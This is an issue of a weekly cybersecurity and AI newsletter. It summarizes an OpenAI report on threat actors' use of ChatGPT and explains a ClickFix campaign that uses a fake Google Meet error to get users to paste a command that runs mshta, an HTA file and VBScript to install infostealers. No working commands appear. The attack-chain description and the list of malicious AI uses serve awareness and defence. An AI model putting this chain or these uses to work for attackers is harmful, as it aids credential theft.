- The Weekend Byte
- Posts
- ClickFix Targets Google Meets
ClickFix Targets Google Meets
Your latest excuse to avoid joining random meetings
The Weekend Byte is a weekly overview of the most important news and events in cybersecurity and AI, captured and analyzed by Jason Rebholz.
I’m back from an awesome vacation and somehow still recovering from jetlag almost a week later. Twelve-hour time differences are no joke...at least it’s cool and socially acceptable to fall asleep at 7:30 PM as an adult…right?
The celebrations continue here, too. This month, The WeekendByte turns one year old!
Thank you to all of you nerds who tune in each week for my terrible attempts at humor, mediocre gifs, and cyber/AI knowledge. Alright, let’s get to it. Today, we’re covering:
Nation-states dabbling in AI
A new reason not to join meetings
Companion AI chats stolen…very awkward
-Jason
AI Spotlight
Threat Actors Are Dabbling in AI
OpenAI released its latest Influence and Cyber Operations report. It’s an update from their prior report, which we covered inNation-States Using ChatGPT for Creativity.
This latest report details their findings from identifying, preventing, and disrupting malicious actors’ attempts at using ChatGPT for “harmful ends.” So far this year, OpenAI has disrupted over 20 operations.
As cybersecurity nerds, we must monitor how threat actors use AI to support their operations. It’s a glimpse into what the future of security will look like. OpenAI had this to say about it:
Threat actors continue to evolve and experiment with our models, but we have not seen evidence of this leading to meaningful breakthroughs in their ability to create substantially new malware or build viral audiences.
Here’s a summary of OpenAI’s case studies that detailed how threat actors are using AI in their cyber operations:
Reconnaissance: Prepping an attack
Asking about vulnerabilities in various applications
Asking for more detailed information on specific vulnerabilities
Asking for default passwords for specific software
Determining popular software and devices used in specific locations
Translating LinkedIn profiles to different languages
Social Engineering: Support in Tricking Humans
Asking for themes that certain groups of people will find interesting
Asking for variations of attacker-provided job recruitment messages
Coding Support: Expedite troubleshooting and creating malicious code
Support in debugging code that can send text messages for smishing campaigns
Support in debugging and implementing an Instagram scraper
Support in debugging and developing Android malware
Asking to create obfuscated scripts
Attack Support: Facilitating hacking
Asking questions on how to use malicious tools
Asking for support in dumping passwords from Windows and Mac devices
Disinformation: Spreading fake
Creating images for use on social media
Create short-form comments
Create long-form articles
Create social media personas
Analyze posts and comments
Manage 150 social media accounts
OpenAI reiterated throughout the report that the threat actors’ use of ChatGPT did not appear to provide “novel capabilities or directions” that could not have otherwise been obtained from publicly available resources.
Interestingly, regarding some ChatGPT usage, like coding, the language shifted slightly, stating that ChatGPT “only offered limited, incremental capabilities for malicious cybersecurity tasks.
So, while we’re not at the point where your grandma can use ChatGPT to launch a cyberattack, we are clearly at a point where someone with the requisite knowledge of how to hack can gain efficiencies in what they do. It's not terrible, but it's not great.
Security Deep Dive
A New Reason Not to Join Meetings
I’ll let you decide if this new attack technique would be effective against you…it relies on your desire to attend meetings.
The attack uses a social engineering tactic known as ClickFix. This basic tactic gives the victim clear instructions that lead them to unknowingly run malicious code on their system, usually under the guise of fixing an error with the application they are trying to run. That code often leads to installing an infostealer on their system.
Per a recent Sekoia blog post, a ClickFix campaign attempted to trick users into joining a Google Meet meeting. Users who clicked on the link are presented with this screen showing a fake error message:
Source: Sekoia’s blog
As you can see, the user is prompted to click “Fix It” on the screen, which copies text to their clipboard. Then, the user is supposed to press their Windows key, copy the text, and press Enter, which would run the copied text.
In this campaign, the copied text would run the legitimate Microsoft mshta program to download and run HTML Application (HTA) files. While legitimate purposes exist for that functionality, attackers like to misuse it because attackers are gonna attack. Here, the HTA file contained a malicious VBScript, an old Windows scripting language that can run commands on the system.
That VBScript downloaded two malicious infostealers capable of stealing passwords and sensitive data from Windows machines. And don’t worry, Mac users, you aren’t left out. A version of this also led to the AMOS Stealer for you.
In the News
What Else is Happening?
💋 Online AI Companion Chat muah.ai was hacked. Calling it an AI Companion chat is the PG version. Said differently, it’s an AI app where you can have…umm…adult conversations of a particular private nature. Well, now all those private conversations are in the hands of the attacker who hacked the site and now is purportedly attempting to extort users.
😨 The UN Office on Drugs and Crime (UNODC) stated that “organized crime groups are converging and exploiting vulnerabilities, and the evolving situation is rapidly outpacing governments’ capacity to contain it.” They also state that financial losses in 2023 alone for victims in East and Southeast Asia range between $18 and $37 billion…yikes.
🧹 Hackers took control of numerous Ecovacs Deebot X2 robot vacuum cleaners. This led to the robots chasing dogs around houses and the hackers yelling obscenities at the homeowners through the vacuum’s onboard speakers. Per Ecovacs, this stemmed from a credential stuffing attack in which the owners’ credentials were obtained from other breaches and used to log into their Ecovac account.
🛒 Amazon reported that over 175 million Amazon customers are using passkeys to secure their accounts! If you haven’t done this, go to your account’s Login & Security settings. It takes almost no time to set up!
🇧🇷 Brazilian authorities arrested the USDoD hacker behind the National Public Data breach. In a strange series of events, after USDoD hacked CrowdStrike and released the company’s internal threat actor list, a CrowdStrike document that included USDoD’s real identity was given to reporters…which USDoD confirmed was legitimate. Meanwhile, National Public Data filed for Chapter 11 bankruptcy in the face of all the incoming litigation.
If you enjoyed this, forward it to a fellow cyber nerd.
If you’re that fellow cyber nerd, subscribe here.
See you next week, nerd!
Reply